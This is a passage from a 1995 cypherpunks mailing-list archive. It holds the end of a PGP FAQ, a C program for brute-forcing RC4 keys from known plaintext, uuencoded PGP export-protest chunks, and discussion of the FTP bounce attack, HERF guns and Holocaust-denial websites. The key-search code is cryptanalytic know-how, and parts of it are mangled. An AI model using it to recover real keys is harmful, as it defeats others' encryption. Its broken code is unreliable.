http://www.info.polymtl.ca/zuse/tavi/www/archive/ro_2.6.2.zip http://www.info.polymtl.ca/zuse/tavi/www/archive/language.txt Russian ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip Spanish ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz Swedish ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt IS PGP LEGAL? Pretty Good Privacy is legal if you follow these rules: Don't export PGP from the USA except to Canada, or from Canada except to the USA, without a license. If you are in the USA, use either Viacrypt PGP (licensed for commercial use) or MIT PGP using RSAREF (limited to personal, noncommercial use). Outside of the USA, where RSA is not patented, you may prefer to use a version of PGP (2.6.i) that doesn't use RSAREF to avoid the restrictions of that license. If you are in a country where the IDEA cipher patent holds in software (including the USA, Canada, and some countries in Europe), make sure you are licensed to use the IDEA cipher commercially before using PGP commercially. (No separate license is required to use the freeware PGP for personal, noncommercial use). For direct IDEA licensing, contact Ascom Systec. Ascom Systec has taken over the distribution of IDEA licenses effective April 1, 1995. Erhard Widmer is the person responsible for the sales aspects, and Peter Hartmann is responsible for the technical aspects. They can be reached as follows: Erhard Widmer, Ascom Systec AG, Dep't. CMVV Phone ++41 64 56 59 83 Peter Hartmann, Ascom Systec AG, Dep't. CMN Phone ++41 64 56 59 45 Fax: ++41 64 56 59 90 e-mail: IDEA at ascom.ch Mail address: Gewerbepark, CH-5506 Maegenwil (Switzerland) Don't sell PGP based on Philip Zimmermann's source code in North America unless you are reselling for Viacrypt (because they have an exclusive marketing agreement on Philip Zimmermann's copyrighted code). (Selling shareware/freeware disks or connect time is OK). This restriction might be lifted with PGP 3.0, since it is a complete rewrite by Colin Plumb. Distribution and use restrictions on that version are still to be determined. If you modify PGP (other than porting it to another platform or adapting it to another compiler), don't call it PGP (TM) or Pretty Good Privacy (TM) without Philip Zimmermann's permission. WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS? Philip Zimmermann is under investigation for alledged violation of export regulations, with a grand jury hearing evidence. There is speculation that the Feds are trying to make an example of Phil by with prolonged and expensive legal proceedings, thus reaping a reward of Fear, Uncertainty, and Doubt to discourage development and use of strong crypto in the USA. Even though people in this country are considered innocent until proven guilty, there is a problem with the system in that it can take lots of money for innocent folks to defend themselves. Because of the broad implications for freedom, privacy, and the First Amendment of the U. S. Constitution in this case, I implore all of you who can to help out with Phil's rather significant legal and travel expenses involved in his defense. Phil is a nice guy with a wife and two children to support, and he has done a great deal in his PGP social activism to help all of us. To send a check or money order by mail, make it payable, NOT to Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust Account." Mail the check or money order to the following address: Philip Dubois 2305 Broadway Boulder, CO USA 80304 (Phone #: 303-444-3885) To send a wire transfer, your bank will need the following information: Bank: VectraBank Routing #: 107004365 Account #: 0113830 Account Name: "Philip L. Dubois, Attorney Trust Account" To contribute using your credit card (secured with PGP), simply compose a message in plain ASCII text giving the following: the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank name of your VISA or MasterCard; the name which appears on it (yours, hopefully :-)); a telephone number at which you can be reached in case of problems; the card number; date of expiry; and, most important, the amount you wish to donate. (Make this last item as large as possible.) Then use PGP to encrypt and ASCII-armor the message using Phil Dubois's public key, distributed with PGP 2.6.2. E-mail the output file to Phil Dubois (dubois at csn.org). Please be sure to use a "Subject:" line reading something like "Phil Zimmermann Defense Fund" so he'll know to decrypt it right away. WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP? http://www.ifi.uio.no/~staalesc/AutoPGP.html ftp://oak.oakland.edu/SimTel/msdos/security/apgp22b.zip ftp://oak.oakland.edu/SimTel/win3/security/pgpw40.zip http://alpha.netaccess.on.ca/~spowell/crypto/pwf31.zip ftp://ftp.netcom.com/pub/dc/dcosenza/pgpw40.zip ftp://Sable.ox.ac.uk/pub ftp://ftp.firstnet.net/pub/windows/winpgp/pgpw40.zip http://www.firstnet.net/~cwgeib/welcom.html ftp://ftp.netcom.com/pub/ec/ecarp/pgpwind.zip http://www.eskimo.com/~joelm (Private Idaho) ftp://ftp.eskimo.com/~joelm http://www.xs4all.nl/~paulwag/security.htm http://www.LCS.com/winpgp.html ftp://mirrors.aol.com/mir01/circa/pub/pc/win3/util/pwf31.zip http://netaccess.on.ca/~rbarclay/index.html http://netaccess.on.ca/~rbarclay/pgp.html ftp://ftp.leo.org/pub/comp/os/os2/crypt/gcppgp10.zip ftp://ftp.leo.org/pub/comp/os/os2/crypt/pmpgp.zip Compuserve: Library 3, European Forum. Library 6, NCSA Forum PCWorld Online Forum. WUGNET Forum. WinShare Forum See also the BBS list for PGP, above. WHERE CAN I GET THE MACPGP KIT? ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/MacPGPkit1.6.sit OTHER MAC ADD-ONS ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/ChainMail.0.7.sit ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/Eudora->PGP Scripts1.5.sit ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/pgp/mac/AppleScripts WHERE IS THE PGP 3.0 API DRAFT? The (prelim. draft) PGP 3.0 API is at: ftp://ftp.netcom.com/pub/dd/ddt/crypto/crypto_info/950212 pgp3spec.txt All comments on it for the PGP 3.0 API Team should be sent to: pgp at lsd.com WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE? PGP can do conventional encryption only of a file (-c) option, but you might want to investigate some of the other alternatives if you do this a lot. Alternatives include Quicrypt and Atbash2 for DOS, DLOCK for DOS & UNIX, Curve Encrypt (for the Mac), HPACK (many platforms), and a few others. Quicrypt is interesting in that it comes in two flavors: shareware exportable and registered secure. Atbash2 is interesting in that it generates ciphertext that can be read over the telephone or sent by Morse code. DLOCK is a no-frills strong encryption program with complete source code. Curve Encrypt has certain user-friendliness advantages. HPACK is an archiver (like ZIP or ARC), but with strong encryption. A couple of starting points for your search are: ftp://ftp.csn.net/mpj/qcrypt10.zip ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/file/ ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/ (see ftp://ftp.csn.net/mpj/README for the ???????) ftp://ftp.miyako.dorm.duke.edu/mpj/crypto/file/ HOW DO I SECURELY DELETE FILES (DOS)? If you have the Norton Utilities, Norton WipeInfo is pretty good. I use DELETE.EXE in del110.zip, which is really good at deleting existing files, but doesn't wipe "unused" space. ftp://ftp.csn.net/mpj/public/del110.zip ftp://ftp.demon.co.uk/pub/ibmpc/security/realdeal.zip WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE? The nature of Windows is that it can swap any memory to disk at any time, meaning that all kinds of interesting things could end up in your swap file. ftp://ftp.firstnet.net/pub/windows/winpgp/wswipe.zip WHAT EVER HAPPENED TO PGPfone(tm)? It is still in the design stages, with a release target of August 1st. Get Nautilus, instead, for now. WHERE DO I GET NAUTILUS? Bill Dorsey, Pat Mullarky, and Paul Rubin have come out with a program called Nautilus that enables you to engage in secure voice conversations between people with multimedia PCs and modems capable of at least 9600 bps. See ftp://ripem.msu.edu/pub/crypt/GETTING_ACCESS ftp://ripem.msu.edu/pub/crypt/other/naut091.zip ftp://ftp.csn.net/mpj/README ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/voice/naut091.zip ftp://ftp.netcom.com/pub/mp/mpj/README ftp://ftp.netcom.com/pub/mp/mpj/I_will_not_export/crypto_???????/voice/naut091.zip ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS ftp://miyako.dorm.duke.edu/mpj/crypto/voice/naut091.zip The Colorado Catacombs BBS 303-772-1062 ftp://ftp.ox.ac.uk/pub/crypto/misc HOW DO I ENCRYPT MY DISK ON-THE-FLY? Rather than manually encrypting and decrypting files, it is sometimes easier (and therefore more secure, because you are more likely to use it) to use a utility that encrypts or decrypts files on the fly as you use them in your favorite applications. This also allows you to automatically encrypt temporary files generated by your applications if they are on the encrypted volume. http://www.cs.auckland.ac.nz/~pgut01/sfs.html ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/disk/ ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/ (see ftp://ftp.csn.net/mpj/README for the ???????) ftp://miyako.dorm.duke.edu/mpj/crypto/disk/ ftp://ftp.nic.surfnet.nl/surfnet/net-security/encryption/disk/ ftp://ftp.demon.co.uk/pub/ibmpc/secdev/secdev14.arj EMAIL/PGP LINKS http://cag-www.lcs.mit.edu/mailcrypt/ (EMACS LISP) WHERE IS PGP'S COMPETION? RIPEM is the second most popular freeware email encryption package. I like PGP better for lots of reasons, but if for some reason you want to check or generate a PEM signature, RIPEM is available at ripem.msu.edu. There is also an exportable RIPEM/SIG. ftp://ripem.msu.edu/pub/GETTING_ACCESS HOW DO I PUBLISH MY PGP PUBLIC KEY? Send mail to one of these addresses with the single word "help" in the subject line to find out how to use them. These servers sychronize keys with each other. pgp-public-keys at burn.ucsd.edu pgp-public-keys at pgp.cc.gatech.edu pgp-public-keys at goliat.upc.es pgp-public-keys at demon.co.uk pgp-public-keys at dsi.unimi.it pgp-public-keys at ext221.sra.co.jp pgp-public-keys at fbihh.informatik.uni-hamburg.de pgp-public-keys at jpunix.com pgp-public-keys at kiae.su pgp-public-keys at kr.com pgp-public-keys at kram.org pgp-public-keys at kub.nl pgp-public-keys at nexus.hpl.hp.com pgp-public-keys at pgp.ai.mit.edu pgp-public-keys at pgp.barclays.co.uk pgp-public-keys at gondolin.org pgp-public-keys at pgp.dhp.com pgp-public-keys at pgp.hpl.hp.com pgp-public-keys at pgp.iastate.edu pgp-public-keys at pgp.kr.com pgp-public-keys at pgp.mit.edu pgp-public-keys at pgp.ox.ac.uk pgp-public-keys at pgp.pipex.net pgp-public-keys at srce.hr pgp-public-keys at sw.oz.au pgp-public-keys at uit.no pgp-public-keys at vorpal.com pgp-public-keys at nic.surfnet.nl WWW interface to the key servers: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html http://www-lsi.upc.es/~alvar/pks/pks-toplev.html For $20/year or so, you can have your key officially certified and published in a "clean" key database that is much less susceptible to denial-of-service attacks than the other key servers. Send mail to info-pgp at Four11.com for information, or look at http://www.Four11.com/ PGP public keys which are stored on SLED's Four11 Key Server are now retrievable by fingering UserEmailAddress at publickey.com. Example: My e-mail addresses is mpj at csn.org finger mpj at csn.org@publickey.com My key (mpj8) is at Four11.com, at ftp://ftp.csn.net/mpj/mpj8.asc, on the key servers, on my BBS, and available by finger. WHICH FAQ IS THE OFFICIAL ONE? The main alt.security.pgp FAQ is published by Jeff A. Licquia, jalicqui at prairienet.org; and is available at ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt This shorter FAQ just covers a few of the most frequent questions and points you to the main FAQ for more answers. This file is ftp://ftp.csn.net/mpj/getpgp.asc, and is available in two parts for more limited nets as ftp://ftp.csn.net/mpj/getpgp1.asc and ftp://ftp.csn.net/mpj/getpgp2.asc There are some other periodic FAQ-related postings, too, like the miniFAQ posted by Andre Bacard, which is more about promoting the use of PGP than where to get it or how to use it. FAQs are also posted to news.answers and alt.answers, and archived at rtfm.mit.edu. CAN I COPY AND REDISTRIBUTE THIS FAQ? Permission is granted to distribute unmodified copies of this FAQ. ___________________________________________________________ | | |\ /| | | Michael Paul Johnson Colorado Catacombs BBS 303-772-1062 | | \/ |o| | PO Box 1151, Longmont CO 80502-1151 USA Jesus is alive! | | | | / _ | mpj at csn.org aka mpj at netcom.com m.p.johnson at ieee.org | | |||/ /_\ | ftp://ftp.csn.net/mpj/README.MPJ CIS: 71331,2332 | | |||\ ( | ftp://ftp.netcom.com/pub/mp/mpj/README -. --- ----- .... | | ||| \ \_/ | PGPprint=F2 5E A1 C1 A6 CF EF 71 12 1F 91 92 6A ED AE A9 | |___________________________________________________________| -----BEGIN PGP SIGNATURE----- Version: 2.7.1 iQCVAwUBMANugfX0zg8FAL9FAQHn+gP/RmULFLJI0FkqmU2Tne5+Xjoy4ZAM5CAU IPaMIbi6Hbqsx2zbVZgPnu4TetXW1hKCRLMcsUoKimJX5cc1LugNhM0IjhBwfN+D 3sfN09KBhGD6f949sg/D4c6BuSfU//d841UEDD4hSfik5D5pPqoPr5tVciYeCC+A d3wqHiPyNzw= =Hj3T -----END PGP SIGNATURE----- From asb at nexor.co.uk Wed Jul 12 02:55:39 1995 From: asb at nexor.co.uk (Andy Brown) Date: Wed, 12 Jul 95 02:55:39 PDT Subject: general RC4 key searcher: optimisations anyone? Message-ID: Hi, The following program is the part of my RC4 key search program that actually does the searching, adapted into a small speed test. It is designed to handle any size key, with any number of unknown bits, in any position within the key. There are, of course, problems with it in its current form: 1. It's too slow. I get 50% of the performance of the bruterc4.c on utopia.hacktic.nl (~9500/sec on a 60Mhz Pentium and ~12000/sec on a Sparc 20) 2. It can only handle bit offsets of 0 (i.e. the lower n bits of the key are unknown). I'm unsure of a really fast way of generalising this to any (contiguous) n bits. 3. There are probably bugs. The code is included below. Does anyone have any comments? - Andy --------------------------- begin code fragment ------------------------ /* RC4 Brute Force Key Searcher, by Andy Brown 1995 This part of the package is meant to be portable between most systems so that Unix users can take part in the searching. After all, the kind of really high powered systems that can make a large dent in the key space are not running Windows NT. You will, however, require an ANSII compiler */ #include #include #include /* function declarations */ int main(void); char *search_range(char *,unsigned long,unsigned long,char *,int, unsigned char *,unsigned char *,int); static void hex_to_bytes(char *,unsigned char *); #define SwapByte(a,b) ((a)^=(b),(b)^=(a),(a)^=(b)) #define hexdigit(a) ((a)<10 ? (a)+'0' : (a)-10+'A') #define decdigit(a) (isdigit(a) ? (a)-'0' : toupper(a)-'A'+10) /*****************************/ /* Main function: test speed */ /*****************************/ int main(void) { /* The key has 20 "unknown" bits */ unsigned char *keyhex="0102030405060708090A0B0C0D000000"; unsigned char *first="0"; unsigned char ciphertext[11]= { 0xF2,0xA2,0xA0,0xF6,0x0F,0xBD,0x69,0x98,0xC0,0xFF,0x4C }; char *retval; time_t before,diff; before=time(NULL); retval=search_range(first,0xFFFFF,0,keyhex,0,"hello world",ciphertext,11); diff=time(NULL)-before; if(retval==NULL) fprintf(stderr,"Key not found, bug in key search code\n"); else fprintf(stderr,"Key is: %s\n%ld keys/sec\n",retval,0xFFFFFL/(long)diff); return 0; } /***********************************/ /* Search a region of the keyspace */ /*********************************** Arguments: start_str: ASCII hex representation of the first "search key" testsl: low order 32 bits of the number of keys to test testsh: high order 32 bits of the number of keys to test keyhex: ASCII hex representation of the key "skeleton" Zeros appear in the key throughout the search range firstbit: zero based index of the first unknown bit plaintext: known plaintext ciphertext: corresponding ciphertext textsize: number of bytes of plain/ciphertext NB: A "search key" is an offset into the searchable keyspace, not a full key in itself. It may vary from 0..(2^numbits)-1 Returns: NULL if the key is not found in the search range, otherwise an ASCII hex representation of the key is returned. This pointer must be dynamically allocated with malloc */ char *search_range(char *start_str,unsigned long testsl,unsigned long testsh, char *keyhex,int firstbit, unsigned char *plaintext,unsigned char *ciphertext, int textsize) { unsigned char *start,*key,*skeleton,state[256],index1,index2; char *retval; int keybytes,startbytes,x,y,counter,i,found=0; unsigned long lowcounter,highcounter; /* allocate space for the key bytes and our starting value */ keybytes=strlen(keyhex)/2; if(strlen(keyhex)&1) keybytes++; startbytes=strlen(start_str)/2; if(strlen(start_str)&1) startbytes++; start=(unsigned char *)malloc(keybytes); memset(start,'\0',keybytes); skeleton=(unsigned char *)malloc(keybytes); key=(unsigned char *)malloc(keybytes); /* convert the hex strings to bytes */ hex_to_bytes(start_str,start+keybytes-startbytes); hex_to_bytes(keyhex,skeleton); /* OK, now things get time-critical. We are about to drop into a loop that prepares and tests each candidate key */ for(highcounter=0;highcounter<=testsh;highcounter++) { for(lowcounter=0;lowcounterstartbytes;i--) key[i]|=start[i]; } /* prepare the key */ for(counter=0;counter<256;counter++) state[counter]=(unsigned char)counter; x=y=0; index1=index2=0; for(counter=0;counter<256;counter++) { index2=(key[index1]+state[counter]+index2) & 0xFF; SwapByte(state[counter],state[index2]); if(++index1==keybytes) index1=0; } /* do two RC4 operations as a preliminary test. If this fails then test the next one, then the rest. This should result in a lot of rejections before the rest of the loop is entered */ x=(x+1) & 0xFF; y=(state[x]+y) & 0xFF; SwapByte(state[x],state[y]); if(plaintext[0]==(ciphertext[0]^state[(state[x]+state[y]) & 0xFF])) { x=(x+1) & 0xFF; y=(state[x]+y) & 0xFF; SwapByte(state[x],state[y]); if(plaintext[1]==(ciphertext[1]^state[(state[x]+state[y]) & 0xFF])) { /* rest of the loop. This will only be entered, on average once every 65536 tests */ for(i=2;i>4); retval[(i*2)+1]=hexdigit(key[i]&0xF); } retval[i*2]='\0'; return retval; } else return NULL; } /*******************************/ /* convert hex string to bytes */ /******************************* eg. "05FC9" would become 0x00,0x5F,0xC9 */ static void hex_to_bytes(char *str,unsigned char *bytes) { int i,firstzero=(strlen(str)&1) ? 1 : 0; unsigned char b; i=0; while(i<(int)strlen(str)) { if(firstzero) firstzero=0; else { b=(decdigit(str[i]))<<4; i++; } b|=decdigit(str[i]); *bytes++=b; i++; } } -------------------------- end code fragment ----------------------- From rah at shipwright.com Wed Jul 12 03:58:40 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 12 Jul 95 03:58:40 PDT Subject: Num Rat Message-ID: >Does anyone know more of this program? Or care to summarize >Benford's Law? I can't wait to learn it. ;-). One more bit of market efficiency for the regulatory arbitrage business. I can see it now: an application of the "BabeWatch" idea to the 1040 form.... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From carolab at censored.org Wed Jul 12 04:05:34 1995 From: carolab at censored.org (Censored Girls Anonymous) Date: Wed, 12 Jul 95 04:05:34 PDT Subject: 17 Down, 696 to go....... Message-ID: Hey! if I can do it, any clueful c'punk can do it! Love Always, Carol Anne PGP.ZIP PART [017/713] This just cycles through: when part 713 is reached, part 0 will be recycled. We are on export 0 at the moment. _________________________________________________________________ ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ Member Internet Society - Certified BETSI Programmer - WWW Page Creation ------------------------------------------------------------------------- Carol Anne Braddock <--now running linux 1.0.9 for your pleasure carolann at censored.org __ __ ____ ___ ___ ____ carolab at primenet.com /__)/__) / / / / /_ /\ / /_ / carolb at spring.com / / \ / / / / /__ / \/ /___ / ------------------------------------------------------------------------- A great place to start My Cyber Doc... From danisch at ira.uka.de Wed Jul 12 04:10:14 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Wed, 12 Jul 95 04:10:14 PDT Subject: The FTP Bounce Attack Message-ID: <9507121103.AA14708@elysion.iaks.ira.uka.de> Also a nice way to walk through firewalls. Perhaps you could write a SATAN script to check it. And you should send a copy of your description to CERT. Hadmut From perry at imsi.com Wed Jul 12 04:46:48 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 04:46:48 PDT Subject: RACIST MILITIA: ATF In-Reply-To: Message-ID: <9507121146.AA10352@snark.imsi.com> And why, pray tell, did you repost this here? Al Thompson writes: > > >> From owner-roc at xmission.com Tue Jul 11 11:10:37 1995 > >> Date: Tue, 11 Jul 1995 13:45:37 -0400 (EDT) > >> From: Ian Goddard > >> To: Libernet at Dartmouth.edu > >> > > > >Header deleted for brevity > > > >> (please re-post) > >> > >> ATF SUMMER CAMP A HOTBED OF RACIAL HATE From mxa2677 at usl.edu Wed Jul 12 04:49:21 1995 From: mxa2677 at usl.edu (Michael J. Axelrod) Date: Wed, 12 Jul 95 04:49:21 PDT Subject: pgp.zip Message-ID: <199507121148.AA16273@armagnac.ucs.usl.edu> So this is what it is like living on the edge ;-{ Warning: it may be illegal to use one of these as a sig file in the US ------------------ PGP.ZIP Part [019/713] ------------------- MPGD!-C$8&.:`1/Y-,6[Z,-Y?O"`PK&X=$W*`,;L1HI MF(JAZ(A:$/`XF)C!]4W(Q>?(Q!*\C0YHC!+R+4`>EB`>_7%/4`86X19NX!HN ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From perry at imsi.com Wed Jul 12 04:50:04 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 04:50:04 PDT Subject: Don't trust the net too much In-Reply-To: <199507120328.XAA02985@bwh.harvard.edu> Message-ID: <9507121149.AA10360@snark.imsi.com> Adam Shostack writes: > More specifically, few items sensitive electronic items are > hardened against electromagnetic pulses. Ever see a speaker interfere > with your TV set? Thats because electrons flying along long free paths in the vacuum of your picture tube are easy to move off of path. However, I'll point out that magnetic fields are always generated by dipoles and fall off very fast with time. I'll also point out that you'd need a damn powerful field to do the following: > Build a big enough speaker, and you can screw with your computers > memory. I'd have to hear very, very powerful evidence that this was possible, especially at a distance. Perry From pgf at tyrell.net Wed Jul 12 05:09:46 1995 From: pgf at tyrell.net (Phil Fraering) Date: Wed, 12 Jul 95 05:09:46 PDT Subject: FW: Edupage 7/9/95 (fwd) In-Reply-To: <9507111658.AA06104@elysion.iaks.ira.uka.de> Message-ID: <199507121204.AA27373@tyrell.net> Date: Tue, 11 Jul 1995 18:58:54 +0200 From: danisch at ira.uka.de (Hadmut Danisch) X-Sun-Charset: US-ASCII Sender: owner-cypherpunks at toad.com Precedence: bulk > I've never seen any actual nazism on the net anywhere, but this "strict > regulation" tactic is obviously fascist in nature. There are certain nazi pages in America. They were showing them in a german tv magazine some time ago, but they didn't tell the URLs. The URL field in the Mosaic window was painted over. Hadmut How do you know they weren't local? From danisch at ira.uka.de Wed Jul 12 05:42:07 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Wed, 12 Jul 95 05:42:07 PDT Subject: FW: Edupage 7/9/95 (fwd) Message-ID: <9507121233.AA15475@elysion.iaks.ira.uka.de> > There are certain nazi pages in America. They were showing them in > a german tv magazine some time ago, but they didn't tell the URLs. > The URL field in the Mosaic window was painted over. > How do you know they weren't local? Because it was an article about Networks in America. They said it was an american web server and they explained how they found it. They found the link on one of these service web pages, and they had an interview with the administrator of this server. They asked him why he has put such links on his honorable server. He answered he didn't have the time to check all references, but in this certain case he will have a look at the page and decide whether he will keep the link or not (if I remember everything well). This was also an american server. And the nazi pages were written in english. The pages were named after the author of the pages (something like 'The XY report', where XY was the authors name, but I can't remember it. The author was an american). BTW: The german tv magazine was the "Kulturreport". From adam at bwh.harvard.edu Wed Jul 12 06:32:41 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 12 Jul 95 06:32:41 PDT Subject: FW: Edupage 7/9/95 (fwd) In-Reply-To: <9507121233.AA15475@elysion.iaks.ira.uka.de> Message-ID: <199507121331.JAA05803@bwh.harvard.edu> | And the nazi pages were written in english. The pages were named | after the author of the pages (something like 'The XY report', where | XY was the authors name, but I can't remember it. The author was | an american). The Leuter report? Leuter was a local moron who claimed to be an engineer. He wrote a report claiming to prove that the gas chambers somewhere were too small to kill many people. The Commonwealth of Mass brought him to court several years ago for "practicing engineering without a license." A good rebuttal of his report was written up by (I think) William McVey, in Canada. Ask in talk.politics.mideast, or soc.history.revisionist or something. I have no idea why this thread is still on cypherpunks, unless its an experiment in text stego. Adam -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From Doug.Hughes at Eng.Auburn.EDU Wed Jul 12 06:51:34 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Wed, 12 Jul 95 06:51:34 PDT Subject: Don't trust the net too much In-Reply-To: <9507121149.AA10360@snark.imsi.com> Message-ID: > >Adam Shostack writes: >> More specifically, few items sensitive electronic items are >> hardened against electromagnetic pulses. Ever see a speaker interfere >> with your TV set? > >Thats because electrons flying along long free paths in the vacuum of >your picture tube are easy to move off of path. However, I'll point >out that magnetic fields are always generated by dipoles and fall off >very fast with time. I'll also point out that you'd need a damn >powerful field to do the following: > >> Build a big enough speaker, and you can screw with your computers >> memory. > >I'd have to hear very, very powerful evidence that this was possible, >especially at a distance. > >Perry > > > For people interested in electromagnetic fields, TEMPEST, emanations, crashing computers, and electronics eavesdropping: Go see Winn Schwartau talk about HERF guns sometime. He passed around a picture of a device for < US$500 that could crash any computer within 50 yards.. Then again, it isn't too good for the person firing the gun either.. (mega EM emissions). The parts are available if you know what to get. a VERY enlightening and frightening presentation. I don't think he personally has built one. His presentation contained a presentation on TEMPEST emissions, and low level EM field effects on sensitive equipment problems too (a PBS documentary - a VERY compelling presentation of why you should never use walkman/CD players/radios/electronics equipment on airplanes if they say not to, and you value your life) Obviously, the further you get away, the faster the field decays, so range to target is important. Then again, the US purportedly used a kind of HERF bomb against Iraqi telecommunications bunkers during the Persian Gulf war. (No I don't have any references about this, but it shouldn't be that hard to verify). -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu "Real programmers use cat > file.as" From jya at pipeline.com Wed Jul 12 06:53:47 1995 From: jya at pipeline.com (John Young) Date: Wed, 12 Jul 95 06:53:47 PDT Subject: QED_jak Message-ID: <199507121353.JAA23961@pipe1.nyc.pipeline.com> 7-12-95. NYPaper: "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses Clues That Led to Code-Breaking." The American intelligence establishment today unveiled one of its oldest secrets: how a small team of codebreakers found the first clues that the Soviet Union sought to steal the blueprints for the atomic bomb in World War II. Using just brain power -- no computers, no stolen skeleton keys -- the cryptographers slowly cracked what was thought to be an unbreakable code. Their work and the fact that they had broken the Soviets' seemingly impenetrable cipher, was until today one of the most tightly held secrets of the National Security Agency, the nation's electronic eavesdropping service. The messages were like a jigsaw puzzle with a billion pieces -- all black. They had been double-coded by a system called a one-time pad -- a unique random code for each message, converting words to numbers in a pattern used only once. HOO_doo [Book review] "What Would Happen if E.T. Actually Called: The implications of finding other intelligence in the universe." Mr. Davies is a supporter of the program called SETI, the search for extraterrestrial intelligence, which aims radio telescopes at thousands of target star systems to try to detect communications from extraterrestrial civilizations. He argues that if we do pick up any signals, or even if we just determine that there is a single microorganism out there that formed independently of earthly contamination, this "would drastically alter our world view and change our society as profoundly as the Copernican and Darwinian revolutions." It would be, Mr. Davies writes, nothing less than "the greatest scientific discovery of all time." ETT_eeg "AT&T Expected to Buy Stake In an Internet Access Provider Cementing its recent link with one of the country's largest corporate Internet access providers, the AT&T Corporation will spend $8 million to buy a stake in the BBN Planet Corporation, according to an executive familiar with the company's plans. BBN_bye 3x Pad: QED_jak From dmandl at bear.com Wed Jul 12 07:19:09 1995 From: dmandl at bear.com (David Mandl) Date: Wed, 12 Jul 95 07:19:09 PDT Subject: FW: Edupage 7/9/95 (fwd) Message-ID: <199507121418.AA21899@bear-gate.bear.com> Adam Shostack wrote: > | And the nazi pages were written in english. The pages were named > | after the author of the pages (something like 'The XY report', where > | XY was the authors name, but I can't remember it. The author was > | an american). > > The Leuter report? Leuter was a local moron who claimed to be > an engineer. He wrote a report claiming to prove that the gas > chambers somewhere were too small to kill many people. For the record: It's Leuchter, Fred Leuchter. > The Commonwealth of Mass brought him to court several years > ago for "practicing engineering without a license." A good rebuttal > of his report was written up by (I think) William McVey, in Canada. > Ask in talk.politics.mideast, or soc.history.revisionist or something. Ken McVay. And dozens of other people too. The newsgroup is alt.revisionism. If you've got any interest in the "holocaust revisionism" phenomenon, it's well worth at least a brief look in there. Incidentally, I would say that this is one of the best uses of the net I've ever seen. This particular brand of neo-nazism is tricky: in their case, it really is true that there's no such thing as bad press. Any exposure they get on TV, the radio, or in print media helps their cause, because of the inherent limitations of those media. They can throw up smokescreens, spew out blatantly false "facts" that sound plausible but can't be confirmed or denied then and there, put on the "we're just skeptics who feel that these questions need to answered even though they're controversial" act, etc. Very difficult to counter, given the strict limitations on time and resources of live broadcasts. But on the net, where claims can be researched and repudiated and responses "broadcast" almost immediately, and where people have all the time in the world to debate these issues, these guys get absolutely trounced every day. They make a claim, it gets blown to smithereens instantly by a dozen people with access to university libraries and scanned photos, and the revisionists crawl away for a while. Then they come back a month later and start again. It gets kind of old after a while, but's fascinating to see (especially for those naive young people to whom the revisionists seem "reasonable"). Even for a part-time Luddite like me, this is an excellent demonstration of how the net is in many ways fundamentally different from traditional print and broadcast media. > I have no idea why this thread is still on cypherpunks, unless > its an experiment in text stego. Well, I hope my little digression above is at least slightly relevant. --Dave. -- ******************************************************************************* Bear Stearns is not responsible for any recommendation, 